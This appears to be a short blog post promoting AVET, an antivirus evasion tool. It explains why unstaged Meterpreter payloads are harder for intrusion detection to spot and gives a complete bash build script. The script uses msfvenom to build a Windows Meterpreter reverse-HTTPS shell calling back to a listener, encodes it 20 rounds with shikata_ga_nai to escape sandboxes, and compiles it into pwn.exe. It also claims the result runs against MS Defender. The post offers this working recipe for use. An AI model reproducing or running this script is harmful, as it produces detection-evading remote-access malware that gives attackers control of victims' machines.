There are several reasons for using unstaged payloads for meterpreter. Since the dlls are not loaded over the network, but are included in the executable file, this may reduce the chance for an IDS/IPS to detect the connection. The executable will be much bigger:
# ls -al pwn_unstaged.exe
-rwxr-xr-x 1 root root 1578548 May 6 11:05 pwn_unstaged.exe
# ls pwn_staged.exe -al
-rwxr-xr-x 1 root root 120884 May 6 11:33 pwn_staged.exe
For more information about unstaged meterpreter connections: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
Here is the build script for the unstaged payload (name: build_win32_meterpreter_unstaged_rev_https_20xshikata.sh):
#!/bin/bash
# simple example script for building the .exe file
# include script containing the compiler var $win32_compiler
# you can edit the compiler in build/global_win32.sh
# or enter $win32_compiler="mycompiler" here
. build/global_win32.sh
# make meterpreter unstaged reverse payload, encoded 20 rounds with shikata_ga_nai
msfvenom -p windows/meterpreter_reverse_https lhost=192.168.2.104 lport=443 extensions=stdapi,priv -e x86/shikata_ga_nai -i 20 -f c -a x86 --platform Windows > sc.txt
# call make_avet, the sandbox escape is due to the many rounds of decoding the shellcode
./make_avet -f sc.txt
# compile to pwn.exe file
$win32_compiler -o pwn.exe avet.c
# cleanup
echo "" > defs.h
And execution (on Windows 7, MS Defender):
Try the new payload and grab your copy of AVET (AntiVirus Evasion Tool):
danielsauder 
Leave a Reply